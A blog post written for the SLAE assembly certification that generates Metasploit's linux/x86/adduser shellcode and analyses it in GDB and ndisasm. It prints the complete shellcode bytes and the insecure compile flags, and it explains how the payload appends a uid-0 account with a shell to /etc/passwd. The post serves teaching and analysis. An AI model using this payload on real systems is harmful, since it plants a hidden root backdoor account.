Source: SecurityTube
I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.
1) We need generate our payload for post analysis
msfpayload linux/x86/adduser USER=doomedraven PASS=rulez C /* * linux/x86/adduser - 98 bytes * http://www.metasploit.com * VERBOSE=false, PrependFork=false, PrependSetresuid=false, * PrependSetreuid=false, PrependSetuid=false, * PrependSetresgid=false, PrependSetregid=false, * PrependSetgid=false, PrependChrootBreak=false, * AppendExit=false, USER=doomedraven, PASS=rulez, * SHELL=/bin/sh */ unsigned char payload[] =\ "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51" "\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63" "\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x29\x00\x00\x00\x64\x6f" "\x6f\x6d\x65\x64\x72\x61\x76\x65\x6e\x3a\x41\x7a\x56\x73\x58" "\x48\x68\x50\x44\x73\x74\x56\x51\x3a\x30\x3a\x30\x3a\x3a\x2f" "\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04" "\x58\xcd\x80\x6a\x01\x58\xcd\x80"; compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcodesource of .C code can be found here
2) Analyzing with GDB
gdb -q ./shellcode (gdb) disassemble Dump of assembler code for function payload: => 0x0804a040 <+0>: xor ecx,ecx; 0 0x0804a042 <+2>: mov ebx,ecx; 0 0x0804a044 <+4>: push 0x46 ; 70 = __NR_setreuid -> man setreuid 0x0804a046 <+6>: pop eax ; get 70 0x0804a047 <+7>: int 0x80 ; syscall return -1 = error 0x0804a049 <+9>: push 0x5 ; 5 0x0804a04b <+11>: pop eax ; eax = 0x5 = __NR_open -> man 2 setreuid 0x0804a04c <+12>: xor ecx,ecx; exc = 0 0x0804a04e <+14>: push ecx ; 0 0x0804a04f <+15>: push 0x64777373 ; dwss 0x0804a054 <+20>: push 0x61702f2f ; ap// <- 2 / becouse is not importand here and we need 4 byte 0x0804a059 <+25>: push 0x6374652f ; cte/ <- start of /etc/passwd 0x0804a05e <+30>: mov ebx,esp ; save pointer to /etc/passwd 0x0804a060 <+32>: inc ecx ; 1 == O_WRONLY <- /usr/include/asm-generic/fcntl.h 0x0804a061 <+33>: mov ch,0x4 ; 0x401 == 1025 = xor 02000,01 == O_APPEND <- /usr/include/asm-generic/fcntl.h 0x0804a063 <+35>: int 0x80 ; syscall return -13 0x0804a065 <+37>: xchg ebx,eax ; save syscall response into ebx 0x0804a066 <+38>: call 0x804a0940x0804a06b <+43>: outs dx,DWORD PTR fs:[esi] 0x0804a06d <+45>: outs dx,DWORD PTR ds:[esi] 0x0804a06e <+46>: ins DWORD PTR es:[edi],dx 0x0804a06f <+47>: gs 0x0804a070 <+48>: fs 0x0804a071 <+49>: jb 0x804a0d4 0x0804a073 <+51>: jbe 0x804a0da 0x0804a075 <+53>: outs dx,BYTE PTR ds:[esi] 0x0804a076 <+54>: cmp al,BYTE PTR [ecx+0x7a] 0x0804a079 <+57>: push esi 0x0804a07a <+58>: jae 0x804a0d4 0x0804a07c <+60>: dec eax 0x0804a07d <+61>: push 0x74734450 0x0804a082 <+66>: push esi 0x0804a083 <+67>: push ecx 0x0804a084 <+68>: cmp dh,BYTE PTR [eax] 0x0804a086 <+70>: cmp dh,BYTE PTR [eax] 0x0804a088 <+72>: cmp bh,BYTE PTR [edx] 0x0804a08a <+74>: das 0x0804a08b <+75>: cmp ch,BYTE PTR [edi] 0x0804a08d <+77>: bound ebp,QWORD PTR [ecx+0x6e] 0x0804a090 <+80>: das 0x0804a091 <+81>: jae 0x804a0fb 0x0804a093 <+83>: or bl,BYTE PTR [ecx-0x75] 0x0804a096 <+86>: push ecx 0x0804a097 <+87>: cld 0x0804a098 <+88>: push 0x4 0x0804a09a <+90>: pop eax ; 4 == __NR_write == write(int fd, const void *buf, size_t count); 0x0804a09b <+91>: int 0x80 ; syscall 0x0804a09d <+93>: push 0x1 0x0804a09f <+95>: pop eax ; 1 exit 0x0804a0a0 <+96>: int 0x80 ; syscall 0x0804a0a2 <+98>: add BYTE PTR [eax],al End of assembler dump.
3) Looking with Ndisasm
User:doomedraven Passwd: import crypt; crypt.crypt('rules', 'Az');'Azble21jpm/n6' msfpayload -p linux/x86/adduser user=doomedraven pass=rules R | ndisasm - ->removed 00000029 0000 add [bx+si],al;0 0000002B 646F fs outsw ;do <- start username 0000002D 6F outsw ;o 0000002E 6D insw ;m 0000002F 65647261 fs jc 0x94 ;edra 00000033 7665 jna 0x9a ;ve 00000035 6E outsb ;n 00000036 3A417A cmp al,[bx+di+0x7a];:Az <- start passwd 00000039 626C65 bound bp,[si+0x65] ;ble 0000003C 3231 xor dh,[bx+di] ;21 0000003E 6A70 push byte +0x70 ;jp 00000040 6D insw ;m 00000041 2F das ;/ 00000042 6E outsb ;n 00000043 363A30 cmp dh,[ss:bx+si] ;6:0 <- passwd end and id 00000046 3A30 cmp dh,[bx+si] ;:0 00000048 3A3A cmp bh,[bp+si] ;:: 0000004A 2F das ;/ 0000004B 3A2F cmp ch,[bx] ;:/ 0000004D 62696E bound bp,[bx+di+0x6e];bin 00000050 2F das ;/ 00000051 7368 jnc 0xbb ;sh 00000053 0A598B or bl,[bx+di-0x75] ; ->removed
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
No hay comentarios:
Publicar un comentario